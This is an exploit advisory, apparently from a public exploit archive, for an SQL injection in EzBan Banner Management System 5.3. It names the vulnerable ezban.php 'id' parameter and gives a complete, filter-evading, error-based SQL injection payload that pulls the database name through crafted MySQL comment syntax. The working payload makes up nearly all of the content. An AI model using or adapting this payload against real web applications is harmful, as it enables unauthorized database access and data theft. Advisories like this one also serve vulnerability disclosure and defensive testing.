EzBan 5.3 SQL Injection
Posted on 09 September 2017
# # # # # # Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection # Dork: N/A # Date: 07.09.2017 # Vendor Homepage: http://www.mysticdreams.net/ # Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip # Demo: http://www.mysticdreams.net/products/ezban/ # Version: 5.3 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # Sql # http://localhost/[PATH]/ezban.php?id=[SQL]&action=show # 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show # # Etc... # # # # #